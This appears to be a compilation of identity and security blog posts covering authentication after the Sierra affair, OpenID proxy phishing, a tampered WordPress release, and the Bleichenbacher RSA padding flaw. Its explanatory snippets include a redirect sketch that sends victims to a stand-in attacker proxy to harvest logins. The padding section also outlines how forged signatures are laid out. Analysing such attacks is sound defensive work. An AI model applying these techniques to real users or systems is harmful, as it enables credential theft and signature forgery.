Jon Udell on the Sierra affair

Jon Udell put up this thought-provoking piece on the widely discussed Sierra affair earlier this week, picking up on my piece and the related comment by Richard Gray.

Kim Cameron had the same reaction to the Sierra affair as I did: Stronger authentication, while no panacea, would be extremely helpful. Kim writes:

Maybe next time Allan and colleagues will be using Information Cards, not passwords, not shared secrets. This won’t extinguish either flaming or trolling, but it can sure make breaking in to someone’s site unbelievably harder.

Commenting on Kim’s entry, Richard Gray (or, more precisely, a source of keystrokes claiming to be one of many Richard Grays) objects on the grounds that all is hopeless so long as digital and real identities are separable:

For so long identity technical commentators have pushed the idea that a person’s digital identity and their real identity can be tightly bound together; then suddenly, when the weakness is finally exposed, everyone once again is forced to say ‘This digital identity is nothing more than a string puppet that I control. I didn’t do this thing, some other puppet master did.’

Yep, it’s a problem, and there’s no bulletproof solution, but we can and should make it a lot harder for the impersonating puppet master to seize control of the strings.

Elsewhere, Stephen O’Grady asks whether history (i.e., a person’s observable online track record) or technology (i.e., strong authentication) is the better defense.

My answer to Stephen is: You need both. I’ve never met Stephen in person, so in one sense, to me, he’s just another source of keystrokes claiming to represent a person. But behind those keystrokes there is a mind, and I’ve observed the workings of that mind for some years now, and that track record does, as Stephen says, powerfully authenticate him.

“Call me naive,” Stephen says, “but I’d like to think that my track record here counts for something.”

Reprising the comment I made on his blog: it counts for a lot, and I rely on mine in just the same way for the same reasons. But: counts for whom? Will the millions who were first introduced to Kathy Sierra and Chris Locke on CNN recently bother to explore their track records and reach their own conclusions?

More to the point, what about Alan Herrell’s track record? I would be inclined to explore it, but I can’t, now, without digging it out of the Google cache.

The best defense is a strong track record and an online identity that’s as securely yours as is feasible.

The identity metasystem that Kim Cameron has been defining, building, and evangelizing is an important step in the right direction. I thought so before I joined Microsoft, and I think so now.

It’s not a panacea. Security is a risk continuum with tradeoffs all along the way. Evaluating the risk and the tradeoffs, in meatspace or in cyberspace, is psychologically hard. Evaluating security technologies, in both realms, is intellectually hard. But in the long run we have no choice: we have to deal with these difficulties.

The other day I lifted this quote from my podcast with Phil Libin:

The basics of asymmetric cryptography are fundamental concepts that any member of society who wants to understand how the world works, or could work, needs to understand.

When Phil said that, my reaction was, “Oh, come on, I’d like to think that could happen but let’s get real. Even I have to stop and think about how that stuff works, and I’ve been aware of it for many years. How can we ever expect those concepts to penetrate the mass consciousness?”

At 21:10-23:00 in the podcast, Phil answers in a fascinating way. Ask twenty random people on the street why the government can’t just print as much money as it wants, he said, and you’ll probably get “a reasonable explanation of inflation in some percentage of those cases.” That completely abstract principle, unknown before Adam Smith, has sunk in. Over time, Phil suggests, the principles of asymmetric cryptography, as they relate to digital identity, will sink in too. But not until those principles are embedded in common experiences, and described in common language.
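For readers who want the flavor of what Phil is asking people to internalize, here is a toy illustration of the asymmetric idea, with deliberately tiny numbers that are useful only for intuition (real keys are hundreds of digits long, and real systems add padding and much else): anyone holding the public key can encrypt, but only the holder of the private key can decrypt.

```python
# Toy RSA with tiny primes -- for intuition only, utterly insecure.
p, q = 61, 53
n = p * q                 # 3233: the public modulus
phi = (p - 1) * (q - 1)   # 3120
e = 17                    # public exponent, coprime with phi
d = pow(e, -1, phi)       # private exponent: modular inverse of e (2753)

def encrypt(m, public=(e, n)):
    """Anyone can do this: they only need the public key (e, n)."""
    exp, mod = public
    return pow(m, exp, mod)

def decrypt(c, private=(d, n)):
    """Only the key holder can do this: it requires the private d."""
    exp, mod = private
    return pow(c, exp, mod)

message = 65
ciphertext = encrypt(message)   # 2790
assert decrypt(ciphertext) == message
```

The asymmetry is the whole point: publishing `(e, n)` lets the world send you secrets, while recovering `d` from them requires factoring `n`, which is infeasible at real key sizes.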

Beyond Stephen O'Grady's piece, the reactions of Jon's readers are of interest too.  In fact, I'm going to post Richard's comments so that everyone gets to see them. 

Name that scam

Received this email from a reader.  Has anyone any idea what was going on? 

Yesterday afternoon, at approximately 2:10pm, I started receiving emails (and phone calls) from a variety of websites, mostly financial (home loans, car loans, debt consolidation) but also other services (BMC music, TheScooterStore, Netflix), claiming to be responding to requests from me (at their websites) for services or information. 

I’ve received about a dozen emails over the past 24hrs, and about the same number of phone calls at home and about half a dozen at work. 
So somebody is entering my name and personal information (home & work phone, work email, home address & home value – all relatively public info – so far nothing worse like SSN or other credit info) into a variety of websites and signing me up for various services. 

Some of these websites (I have spoken with several sales people on the phone) are part of marketing networks that either share or sell such information (leads), and I have tracked several of these down to a common source, although it appears that there are at least several root sources involved. 

My question is this: what is the scam? 

It’s possible it’s just personal harassment, and there is someone out there who is trying to give me a bad time or is playing a not-so-funny joke. 

It doesn’t feel like identity theft – they don’t seem to have private info, but instead seem to have assembled some relatively public info and are inputting that into a bunch of websites. 

Could this be someone trying to defraud a marketing network? If so, do you know how that works? 

Ever heard of anything like this before? (maybe this is a common thing?) 

Btw, at least some of the companies contacting me are legit (QuickenLoans for example, and they were quite helpful on the phone) so it seems the “fraud” is on the input side?

I asked the person who was the target of this attack how he knew for sure he had been speaking with people from QuickenLoans, for example.  Apparently they seemed credible and helpful, so he never questioned their claims or asked to call them back.

It all reminds me of this.

Transducers and Delegation

Ernst Lopez Cordozo recently posted a very interesting comment about delegation issues:

“We always use delegation: if I use a piece of software on my machine to login to a site or application, it is that piece of software (e.g. the CardSpace client) that does the transaction, claiming it is authorized to do so.

“But if the software is compromised, it may misrepresent me or even somebody else. Is there a fundamental difference between software on my (owned? managed? checked?) machine and a machine under somebody else’s control?”

Ernst’s “We always use delegation” may be true, but risks losing sight of important distinctions. Despite that, it invites us to think about complex issues.

Analog-to-Digital transducers

There are modules within one's operating system whose job is to convey our language and responses: they sense our behavior through a keyboard or mouse or microphone, and transform it into a stream of bits.

The sensors constitute a transducer that converts our behavior from the physical world to the digital one. Once converted, this behavior is communicated to service endpoints (local or distant) through what we’ve called “channels”.

There are lots of examples of similar transducers in more specialized realms – anywhere that benefit is to be had by converting physical being to electrical impulses or streams of bits. And there are more examples of this every day.

Consider the accelerator pedal in your car. Last century, it physically controlled gas flowing to your engine. Today, your car may not even use gas… If it does, there are more efficient ways of controlling fuel injection than with raw foot pressure… The “accelerator” has been transformed into a digital transducer. Directly or indirectly, it now generates a digital representation of how much you want to accelerate; this is fed into a computer as one of several inputs that actually regulate gas flow (or an electric engine).
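A drive-by-wire pedal makes a nice minimal example of such a transducer. The sketch below is illustrative only (the ranges, bit widths, and function names are mine, not any real engine controller's interface): the physical pedal travel is sampled into a bounded digital value, which the controller then consumes as one input among several.

```python
def pedal_to_digital(angle_degrees: float, max_angle: float = 30.0, bits: int = 10) -> int:
    """Transducer step: convert physical pedal travel into a 10-bit reading."""
    fraction = min(max(angle_degrees / max_angle, 0.0), 1.0)  # clamp to the pedal's range
    return round(fraction * (2 ** bits - 1))

def fuel_command(pedal_reading: int, engine_warm: bool) -> int:
    """Controller step: the digital reading is one input among several."""
    if not engine_warm:
        return min(pedal_reading, 511)  # e.g. cap demand while the engine warms up
    return pedal_reading

full_throttle = pedal_to_digital(30.0)          # 1023: pedal to the floor
assert fuel_command(full_throttle, engine_warm=False) == 511
assert fuel_command(full_throttle, engine_warm=True) == 1023
```

The point of the example is the division of labor: the transducer faithfully digitizes intent, while a separate component decides what to do with it.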

Microphones make a more familiar example. Their role is to take sounds, which are physical vibrations, and convert them into micro currents that can then be harnessed directly – or digitized. So again, we have a transducer. This one feeds a channel representing the sound-field at the microphone.

I’m certain that Ernst would not argue that we “delegate” control of acceleration to the foot pedal in our car – the “foot-pedal-associated-components” constitute the transducer that conveys our intentions to engine control systems.

Similarly, no singer – recording through a microphone into a solid-state recording chain – would think of herself as “delegating” to the microphone… The microphone is just the transducer that converts the singer's voice from the physical realm to the electrical – hopefully introducing as little color as possible. The singer delegates to her manager or press representative – not to her microphone.

So I think we need to tease apart two classes of things that we want done when using computers. One is for our computers to serve as colorless transducers through which we can “become digital”, responding ourselves to digital events.

The other is for computers to “act in our stead” – analyze inputs, apply logic and policy (perhaps one day intuition?), and make decisions for us, or perform tasks, in the digital sphere.

Through the transducer systems, we are able to “dictate” onto post-physical media. The system which “takes dictation” performs no interpretation. It is colorless, a transcription from one medium to another. Dictation is the promulgation of “what I say”: stenography in the last century; digitization in this.

When we type at our keyboard and click with our mouse, we dictate to obedient digital scribes that convert our words and movements into the digital realm, rather than onto papyrus. These scribes differ from the executors and ambassadors and other reactive agents who are our “delegates”. There is in this sense a duality with the transducer on one side and the delegate on the other.

Protection of the channel

No one ever worried about evil parties intercepting the audio stream when Maria Callas stood before a microphone. That is partly because the recording equipment was protected through physical security; and partly because there was no economic incentive to do so.

In the early days, computers were like that too. The primitive transducer comprised a rigid and inalterable terminal – if not a punch card reader – and the resulting signal travelled along actual WIRES under the complete control of those managing the system.

Over time the computing components became progressively more dissociated. Distances grew and wires began to disappear: ensuring the physical security of a distributed system is no longer possible. As computers evolved into being a medium of exchange for business, the rewards for subverting them increased disproportionately.

In this environment, the question becomes one of how we know the “digital dictation” received from a transducer has not been altered on the way to the recipient. There is also a fundamental question about who gave the dictation in the first place.

In the digital realm, the only way to ensure integrity across component boundaries is through cryptography. One wants the dictation to be cryptographically protected – as close to the transducer as possible. The ideal answer is: “Protect the dictation in the transducer to ensure no computer process has altered it”. This is done by giving the transducer a key. Then we can have secure digital dictation.
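As a sketch of “giving the transducer a key” (the names and the shared-key setup here are illustrative; a real design would seal the key in hardware, and would likely prefer asymmetric signatures so the verifier need not hold the secret): the transducer tags each chunk of dictation with a MAC under its key, and the recipient rejects anything altered in transit.

```python
import hmac
import hashlib

# Assumption for this sketch: the key never leaves the transducer hardware.
TRANSDUCER_KEY = b"secret-key-sealed-in-the-transducer"

def emit(dictation: bytes):
    """Transducer side: sign each chunk of dictation as it is produced."""
    tag = hmac.new(TRANSDUCER_KEY, dictation, hashlib.sha256).hexdigest()
    return dictation, tag

def verify(dictation: bytes, tag: str) -> bool:
    """Recipient side: check the chunk against the transducer's key."""
    expected = hmac.new(TRANSDUCER_KEY, dictation, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)

chunk, tag = emit(b"transfer $10 to Alice")
assert verify(chunk, tag)                            # unaltered dictation passes
assert not verify(b"transfer $10 to Mallory", tag)   # altered dictation is rejected
```

No intermediate process can modify the dictation without invalidating the tag, which is exactly the property wanted from protection “as close to the transducer as possible”.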

Compromise of software

Ernst talks about software compromise. Clearly, other things being equal, the tighter the binding between a transducer (taken in a wide sense) and its cryptographic module, the less opportunity there is for attack on the dictation channel. Given digital physics, this equates to reduction of the software surface area. It is thus best to keep processes and components compartmentalized, with clear boundaries, clear identities.

This, in itself, is a compelling reason to partition activities: the transducer being one component; processes taking this channel as an input then having separate identities.

Going forward we can expect there will be widely available hardware-based Trusted Platform Modules capable of ensuring that only a trusted loader will run. Given this, one will see loaders that will only allow trusted transducers to run. If this is combined with sufficiently advanced virtualization, we can predict machines that will achieve entirely new levels of security.
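The trusted-loader idea can be sketched as a measurement chain, in the spirit of a TPM's PCR-extend operation (greatly simplified here; a real TPM keeps the register in tamper-resistant hardware and the loader enforces policy on it): each component is hashed into a running register before it runs, so the final value reflects exactly what was loaded.

```python
import hashlib

def extend(register: bytes, component: bytes) -> bytes:
    # PCR-style extend: new = H(old || H(component))
    return hashlib.sha256(register + hashlib.sha256(component).digest()).digest()

def measure_boot(components) -> bytes:
    register = b"\x00" * 32  # the register starts at a well-known value
    for c in components:
        register = extend(register, c)
    return register

trusted = measure_boot([b"loader v1", b"transducer v1"])
tampered = measure_boot([b"loader v1", b"transducer v1 (patched)"])
assert trusted != tampered  # any substitution changes the final measurement
assert measure_boot([b"loader v1", b"transducer v1"]) == trusted  # same stack reproduces it
```

A loader that only releases keys, or only proceeds, when the measurement matches a known-good value is one way to get “only trusted transducers will run”.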


Given the distinctions being presented here, I see CardSpace as a transducer capable of bringing the physical human user into the digital identity system. It provides a context for the senses and translates her actions and responses into underlying protocol activities. It aims at adding no color to her actions, and at taking no decisions on its own. 

In this sense, it is not the same as a process performing delegation – and if we say it is, then we have started making “delegation” such a broad concept that it doesn’t say much at all. This lack of precision may not be the end of the world – perhaps we need new words all the way round. But in the meantime, I think separating transducers from entities that are proactive on our behalf is an indispensable precondition to achieving systems with enough isolation between components that they can be secure in the profound ways that will be required going forward.

Comment problem seems due to Firefox bug

As Pamela explains, it was neither the upgrade to WordPress 2.0.2 (made necessary by a security vulnerability discovered in WordPress 2.0.1), nor the nifty Pamela Project code, that has been causing problems when using non-Windows Card Selectors with Firefox on my blog.  Instead, it is the latest rev of Firefox itself (bugs are being filed).

For anyone who is using the “xmldap Identity Selector” Firefox plugin on the Mac and has suddenly found that they are unable to log into the PamelaWare Test Blog or Product Blog or Pat’s or Kim’s blogs, the problem is not with the blogs themselves. The problem appears to be buggy nastiness in the Mac version of Firefox, which wreaks havoc with Chuck’s plugin (xmldap Identity Selector v0.8.6). If you uninstall Firefox and then install Firefox from (get release here), you will be able to authenticate to everyone’s blogs once again. The Safari plugin works as well, so if you would rather not reinstall Firefox, you could satisfy your Information Card needs by using that plugin on your Mac instead.

We now return you to your regularly scheduled blog commenting :)

A number of people also discovered a less severe problem where comments ended up in a manual approval queue rather than being automatically posted even after InfoCard login.  If you have logged in with an InfoCard you should be getting automated instant access.  As far as I can tell, this now works properly.

Please keep me posted about any other issues.  This will help everyone using WordPress with the Pamela Project plugin.

Final note:  automated trackbacks will also be slowed down while I strengthen the trackback spam filter (gee – too bad there is no delegated authentication yet…).  If you want me to see a posting quickly, please drop me an i-names email.

WordPress 2.1.1 dangerous, Upgrade to 2.1.2

Any product that is really successful is going to be attacked.  Over time the attacks will become progressively more sophisticated.  Given how popular – and how good – WordPress is, it doesn't surprise me that it has attracted enough attention that someone eventually broke through. 

Guess what?  I'm running 2.1.1 in my test environment.  Good thing I haven't flicked the switch.  Anyway, here's the scoop as explained by WordPress:

Long story short: If you downloaded WordPress 2.1.1 within the past 3-4 days, your files may include a security exploit that was added by a cracker, and you should upgrade all of your files to 2.1.2 immediately.

Longer explanation: This morning we received a note to our security mailing address about unusual and highly exploitable code in WordPress. The issue was investigated, and it appeared that the 2.1.1 download had been modified from its original code. We took the website down immediately to investigate what happened.

It was determined that a cracker had gained user-level access to one of the servers that powers, and had used that access to modify the download file. We have locked down that server for further forensics, but at this time it appears that the 2.1.1 download was the only thing touched by the attack. They modified two files in WP to include code that would allow for remote PHP execution.

This is the kind of thing you pray never happens, but it did and now we’re dealing with it as best we can. Although not all downloads of 2.1.1 were affected, we’re declaring the entire version dangerous and have released a new version 2.1.2 that includes minor updates and entirely verified files. We are also taking lots of measures to ensure something like this can’t happen again, not the least of which is minutely external verification of the download package so we’ll know immediately if something goes wrong for any reason.

Finally, we reset passwords for a number of users with SVN and other access, so you may need to reset your password on the forums before you can login again. (More here…)

Am I ever relieved that I'm using Project Pamela's InfoCard plugin in the new environment!  I haven't written about it yet, since I've been evaluating the beta.  But thanks to Project Pamela, I will just have to download 2.1.2, and change one line in one WordPress file to get InfoCard login working with it.  Let's drink a toast to proper factoring!  I'll be writing about this amazing plugin soon.

By the way, I have good news for the old-fashioned.  I'll be able to turn on username / password for comments again, since version 2.1.2 gets over the registration vulnerabilities in my current version. 

The whole episode brings up the interesting question of how to secure a widely distributed software project.  The more desirable you are as a target, the better the tools you need.  One day I hope to talk to the WordPress folks about incorporating InfoCards into their development process.


Scary phishing video from gnucitizen

Here's a must-see that punctuates our current conversation with – are you ready? – drama and numerous other arts.

Beyond the fact that it's just plain cool – and scary – as a production, it underlines one of the main points we need to get across.  The evolution of the virtual world will be blocked until we can make it as safe as the physical one. 

As Pam says, “this video really captures the panic involved in being hacked…”.  That's for sure.

Ben Laurie and the “Kittens” phishing attack.

Here's a post about potential OpenID phishing problems by Ben Laurie, long-time security advocate who played an important role in getting SSL into open source.  He's now at Google.  Don't misinterpret his intentions despite his characteristically colorful introductory sentence – in a subsequent piece he makes it clear that he too wants to find solutions to these problems.

OpenID announced the release of a new draft of OpenID Authentication 2.0 today. I’m reluctantly forced to come to the conclusion that the OpenID people don’t care about phishing, since they’ve defined a standard that has to be the worst I’ve ever seen from a phishing point of view.

OK, so what’s the problem? If I’m a phisher my goal is to be able to log in to some website, the Real Website, as you, the Innocent Victim. In order to do this, I persuade you to go to a website I control that looks like the Real Website. When you log in, thinking it is the Real Website, I get your username and password, and I can then proceed to empty your Paypal account, write myself cheques from your bank account, or whatever fiendish plan I have today.

So, why does OpenID make this worse? Because in the standard case, I (the phisher) have to make my website look like the Real Website and persuade you to go to it somehow – i.e. con you into thinking I am the real Paypal, and your account really has been frozen (or is that phrozen?) and you really do need to log in to unphreeze it.

But in the OpenID case I just persuade you to go anywhere at all, say my lovely site of kitten photos, and get you to log in using your OpenID. Following the protocol, I find out where your provider is (i.e. the site you log in to to prove you really own that OpenID), but instead of sending you there (because, yes, OpenID works by having the site you’re logging in to send you to your provider) I send you to my fake provider, which then just proxies the real provider, stealing your login as it does. I don’t have to persuade you that I’m anything special, just someone who wants you to use OpenID, as the designers hope will become commonplace, and I don’t have to know your provider in advance.

So, I can steal login credentials on a massive basis without any tailoring or pretence at all! All I need is good photos of kittens.

I had hoped that by constantly bringing this up the OpenID people might take some step to deal with the issue, but they continue to insist on punting on it entirely:

The manner in which the end user authenticates to their OP [OpenID provider] and any policies surrounding such authentication is out of scope for this document.

which means, in practice, people will authenticate using passwords in forms, as usual. Which means, in turn, that phishing will be trivial.

Like me, Ben was struck with how readily the system currently lends itself to automation of phishing attacks.  His second post on the subject is also interesting.
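In outline, the attack Ben describes needs almost no machinery. An honest relying party discovers your provider from your URL and redirects you there; a phishing relying party redirects you to its own proxy instead. All of the URLs and the lookup table below are hypothetical stand-ins for real OpenID discovery:

```python
# Sketch of the redirect step: honest vs. phishing relying party.
def discover_provider(openid_url: str) -> str:
    # Stand-in for real discovery (fetching the URL and reading its
    # declared provider endpoint); here, a hypothetical lookup table.
    providers = {"https://alice.example.com/": "https://provider.example.com/login"}
    return providers[openid_url]

def honest_rp_redirect(openid_url: str) -> str:
    # The honest site sends you to YOUR provider to authenticate.
    return discover_provider(openid_url)

def phishing_rp_redirect(openid_url: str) -> str:
    # The evil site still runs discovery -- then sends you to a proxy
    # of the real provider, harvesting credentials as they pass through.
    real = discover_provider(openid_url)
    return "https://evil-kittens.example.net/proxy?to=" + real

assert honest_rp_redirect("https://alice.example.com/") == "https://provider.example.com/login"
assert phishing_rp_redirect("https://alice.example.com/").startswith("https://evil-kittens.example.net/")
```

The login page the victim then sees can be pixel-perfect, because it is her real provider's page, relayed through the proxy, and the victim herself supplied the URL that tells the attacker which provider to imitate.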


As simple as possible – but no simpler

Gunnar Peterson recently showed me a posting by Andy Jaquith ( and JSPWiki) that combines coding, wiki, identity, CardSpace, cybervandals, and OpenID all into one post – a pretty interesting set of memes.  Like me, he finally shut off anonymous commentary because he couldn't stand the spam workload, and is looking for answers:

Last week's shutoff of this website's self-registration system was something I did with deep misgivings. I've always been a fan of keeping the Web as open as possible. I cannot stand soul-sucking, personally invasive registration processes like the New York Times website. However, my experience with a particularly persistent Italian vandal was instructive, and it got me thinking about the relationship between accountability and identity.

Some background. When you self-register on you supply a desired “wiki name”, a full name, a desired login id, and optionally an e-mail address for password resets. We require the identifying information to associate specific activities (page edits, attachment uploads, login/log out events) with particular members. We do not verify the information, and we trust that the user is telling the truth. Our Italian vandal decided to abuse our trust in him by attaching pr0n links to the front page. Cute.

The software we use here on has decent audit logs. It was a simple matter of identifying the offending user account. I know which user put the porn spam on the website, and I know when he did it. I also know when he logged in, what IP address he came from, and what he claimed his “real” name was. But although I've got a decent amount of forensic information available to me, what I don't have is any idea of whether the person who did it supplied real information when he registered.

And therein lies the paradox. I don't want to keep personal information about members — but at the same time, I want to have some degree of assurance that people who choose to become members are real people who have serious intent. But there's no way to get any level of assurance about intent. After all, as the New Yorker cartoon aptly put it, on the Internet no-one knows if you're a dog. Or just a jackass.

During the holiday break, I did a bit of thinking and exploration about how to address (note I do not say “solve”) issues of identity and accountability, in the context of website registration. Because I am a co-author of the software we use to run this website (JSPWiki), I have a fair amount of freedom in coming up with possible enhancements.

One obvious way to address self-registration identity issue is to introduce a vetting system into the registration process. That is, when someone registers, it triggers a little workflow that requires me to do some investigation on the person. I already do this for the mailing list, so it would be a logical extension to do it for the wiki, too. This would solve the identity issue — successfully vetting someone would enable the administrator to have much higher confidence in their identity claims, albeit with some sacrifice

There's just one problem with this — I hate vetting people. It takes time to do, and I am always far, far behind.

A second approach is to not do anything special for registration, but moderate page changes. This, too, requires workflow. On the JSPWiki developer mailing lists, we've been discussing this option quite a bit, in combination with blacklists and anti-spam heuristics. This would help solve the accountability problem.

A third approach would be to accept third-party identities that you have a reasonable level of assurance in. Classic PKI (digital certificates) are a good example of third-party identities that you can inspect and choose to trust or not. But client-side digital certificates have deployment shortcomings. Very few people use them.

A promising alternative to client-side certificates is the new breed of digital identity architectures, many of which do not require a huge, monolithic corporate infrastructure to issue. I'm thinking mostly of OpenID and Microsoft's CardSpace specs. I really like what Kim Cameron has done with CardSpace; it takes a lot of the things that I like about Apple's Keychain (self-management, portability, simple user metaphors, ease-of-use) and applies it specifically to the issue of identity. CardSpace‘s InfoCards (I have always felt they should be called IdentityCards) are kind of like credit cards in your wallet. When you want to express a claim about your identity, you pick a card (any card!) and present it to the person who's asking.

What's nice about InfoCards is that, in theory, these are things you can create for yourself at a registrar (identity provider) of your choice. InfoCards also have good privacy controls — if you don't want a relying party (e.g., to see your e-mail identity attribute, you don't have to release that information.

So, InfoCards have promise. But they use the WS-* XML standards for communication (think: big, hairy, complicated), and they require a client-side supplicant that allows users to navigate their InfoCards and present them when asked. It's nice to see that there's a Firefox InfoCard client, but there isn't one for Safari, and older versions of Windows are still left out in the cold. CardSpace will make its mark in time, but it is still early, methinks.

OpenID holds more promise for me. There are loads more implementations available (and several choices for Java libraries), and the mechanism that identity providers use to communicate with relying parties is simple and comprehensible by humans. It doesn't require special software because it relies on HTTP redirects to work. And best of all, the thing the identity is based on is something “my kind of people” all have: a website URL. Identity, essentially, boils down to an assertion of ownership over a URL. I like this because it's something I can verify easily. And by visiting your website, I can usually tell whether the person who owns that URL is my kind of people.

OpenID is cool. I got far enough into the evaluation process to do some reasonably serious interoperability testing with the SXIP and JanRain libraries. I mocked up a web server and got it to successfully accept identities from the Technorati and VeriSign OpenID services. But I hit a few snags.

Recall that the point of all of this fooling around is to figure out a way to balance privacy and authenticity. By “privacy”, I mean that I do not want to ask users to disgorge too much personal information to me when they register. And correspondingly, I do not want the custodial obligation of having to store and safeguard any information they give me. The ideal implementation, therefore, would accept an OpenID identity when presented, dynamically collect the attributes we want (really, just the full name and website URL) and pull them into our in-memory session, and flush them at the end of the session. In other words, the integrity of the attributes presented, combined with transience, yields privacy. It's kind of like the front-desk guard I used to see when I consulted to the Massachusetts Department of Mental Health. He was a rehabilitated patient, but his years of illness and heavy treatment left him with no memory for faces at all. Despite the fact I'd visited DMH on dozens of occasions, every time I signed in he would ask “Have you been here before? Do you know where you are going?” Put another way, integrity of identity + dynamic attribute exchange protocols + enforced amnesia = privacy.

By “authenticity” I mean having reasonable assurance that the person on my website is not just who they say they are, but that I can also get some idea about their intentions (or what they might have been). OpenID meets both of these criteria… if I want to know something more about the person registering or posting on my website, I can just go and check ’em out by visiting their URL.

But, in my experiments I found that the attribute-exchange process needs work… I could not get VeriSign's or Technorati's identity provider to release to my relying website the attributes I wanted, namely my identity's full name and e-mail addresses. I determined that this was because neither of these identity providers support what the OpenID people call the “Simple Registration” profile aka SREG.

More on this later. Needless to say, I am encouraged by my progress so far. And regardless of the outcome of my investigations into InfoCard and OpenID, my JSPWiki workflow library development continues at a torrid pace.

Bottom line: once we have a decent workflow system in place, I'll open registrations back up. And longer term, we will have some more open identity system choices.

Hmmm.  Interesting thoughts that I want to explore more over the next while.

Before I get to the nitty-gritty, please note that CardSpace and InfoCards do NOT require a wiki or web site to use WS-* protocols.

The system supports WS-*, which gives it the ability to handle upper-end scenarios, but doesn't require it and can operate in a RESTful mode! 

So the actual effort required to implement the client side is on the same order of magnitude as for OpenID.  But I agree there are not very many open-source options out there for doing this yet – requiring more creativity on the part of the implementor.  I'm trying to help with this.

It's also true that InfoCards require client software (although there are ways around this if someone is enterprising: you could build an infocard selector that “lives in the cloud”).

But the advantages of InfoCard speak clearly too.  Andy Jaquith would find that release of user information is built right in, and that “what you see is what you get” – user control.  Further, the model doesn't expose the user to the risk that personal information will become public by being posted on the web.  This makes it useful in a number of applications which OpenID can't handle without a lot of complexity.

But what's the core issue? 

InfoCards change the current model in which the user can be controlled by an evil site.  OpenID doesn't.

If a user ends up at an evil site today, it can pose as a good site known to the user by scooping the good site's skin so the user is fooled into entering her username and password.

But think of what we unleash with OpenID…

It's way easier for the evil site to scoop the skin of a user's OpenID service because – are you ready? – the user helps out by entering her honeypot's URL!

By playing back her OpenID skin the evil site can trick the user into revealing her creds.  But these are magic creds,  the keys to her whole kingdom!  The result is a world more perilous than the one we live in now.

If that isn't enough, evil doers armed with identifiers and ill-gotten creds can then crawl the web to see where the URL they have absconded with is in play, and break into those locations too.

The attacks on OpenID all lend themselves to automation…

One can say all this doesn't matter because these are low-value identities, but I think we set off on the wrong foot unless we build room for evolution into OpenID from the start.

It will really be a shame if all the interest in new identity technology leads to security breaches worse than those that currently exist, and brings about a further demoralization of the user.

I'd like to see OpenID and InfoCard technologies come together more.  I'll be presenting a plan for that over the next little while.


Anti-phishing Mashup

Here's a site dedicated to phishing control that has produced a bizarre mashup that I find fascinating – Web 2.0 meets Magnum PI.  It combines information from the Anti-Phishing Working Group with novel visualization techniques and animation so you can analyse the topologies of phishing trips over time.

A phishing message arrives in your mailbox, pretending to be from a bank, or from an e-tailer such as eBay or PayPal. It directs you to a web page and asks you to enter your password or social security number to verify your identity, but the web page is not one actually associated with the bank; it's on some other server.

InternetPerils has discovered that those phishing servers cluster, and infest ISPs at the same locations for weeks or months.

Here's an example of a phishing cluster in Germany, ever-changing yet persistent for four months, according to path data collected and processed by InternetPerils, using phishing server addresses from the Anti-Phishing Working Group (APWG) repository.

Phishing Cluster over Time

Figure 1: A Persistent Phishing Cluster

The ellipses in this animation represent servers; the boxes represent routers; and the arrows show the varying connectivity among them. Colors of boxes reflect ownership of parts of the network. Times are GMT.

The animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.

Graphs were produced using PerilScope™, which is InternetPerils' interactive topology examination interface, based upon the GAIN platform.

Go to their site to see the actual animated mashup.

OpenSSL vulnerability

Ben Laurie and Matasano Chargen describe a significant attack on RSA signature implementations (not the algorithm itself).  Quoting from Matasano:

Bell Labs crypto shaolin Daniel Bleichenbacher disclosed a freaky attack on RSA signature implementations that may, under some common circumstances, break SSL/TLS.

Do I have your attention? Good, because this involves PKCS padding, which is not exciting. Bear with me.

RSA signatures use a public signing keypair with a message digest (like SHA1) to stamp a document or protocol message. In RSA, signing and verification are analogs of decryption and encryption. To sign a message, you:

  1. Hash it
  2. Expand the (short) hash to the (long) size of the RSA modulus
  3. Convert that expansion to a number
  4. RSA decrypt the number
  5. Convert that to a series of bytes, which is your signature.
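The sign = "decrypt", verify = "encrypt" analogy in steps 4 and 5 fits in a few lines of Python. This is my illustration, not code from the post, and the toy key below is absurdly small and insecure:

```python
# Toy RSA keypair -- illustration only, far too small for real use.
p, q = 61, 53
n = p * q                            # public modulus
e = 17                               # public exponent
d = pow(e, -1, (p - 1) * (q - 1))    # private exponent (Python 3.8+)

m = 42                               # stands in for the padded hash, as a number
s = pow(m, d, n)                     # step 4: "RSA decrypt" the number -> signature
assert pow(s, e, n) == m             # verification "encrypts" it back to the padded hash
```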

It’s step 2 we care about here. It’s called “padding”. You need it because RSA wants to encrypt or decrypt something that is the same size as the RSA key modulus.

There are a bunch of different ways to pad data before operating on it, but the one everyone uses is called PKCS#1 v1.5 (technically, EMSA-PKCS1-V1_5-ENCODE). It involves tacking a bunch of data in front of your hash, enough to pad it out to the size of the modulus:

[image: 00 01 | FF FF ... FF | 00 | ASN.1 DigestInfo (digest algorithm + hash)]
Note the order and placement of those boxes. They’re all variable length. Let’s call that out:

[image: 00 01 (fixed) | FF ... FF (variable length) | 00 | DigestInfo (variable length, carries its own length field)]
The two big goals of a padding scheme are (a) expanding messages to the modulus length and (b) making it easy to correctly recover the message bytes later, regardless of what they are. This padding scheme is designed to make that straightforward. The padding bytes are clearly marked (“00 01”, which tells you that PKCS#1 v1.5 is in use), terminated (with a 00, which cannot occur in the padding), and followed by a blob of data with a length field. This whole bundle of data is what RSA works on.
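The encoding step can be sketched in a few lines of Python. This is a minimal illustration assuming SHA-1; the function name is mine, not from any standard library:

```python
import hashlib

def emsa_pkcs1_v15_sha1(message: bytes, em_len: int) -> bytes:
    """Build the padded block: 00 01 | FF..FF | 00 | DigestInfo."""
    # Fixed ASN.1 DigestInfo header for SHA-1 (algorithm ID + OCTET STRING tag).
    sha1_prefix = bytes.fromhex("3021300906052b0e03021a05000414")
    digest_info = sha1_prefix + hashlib.sha1(message).digest()
    pad_len = em_len - len(digest_info) - 3   # room left after 00 01 ... 00
    assert pad_len >= 8, "modulus too small for this digest"
    return b"\x00\x01" + b"\xff" * pad_len + b"\x00" + digest_info

em = emsa_pkcs1_v15_sha1(b"hello", 128)   # 128 bytes = a 1024-bit modulus
assert em[:2] == b"\x00\x01" and len(em) == 128
```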

The problem is, despite all the flexibility PKCS#1 v1.5 gives you, nobody expects you to ever use any of it. In fact, a lot of software apparently depends on data being laid out basically like the picture above. But all the metadata in that message gives you other options. For instance:

[image: 00 01 | FF | 00 | DigestInfo (digest algorithm + hash) | evil bits filling out the rest of the block]
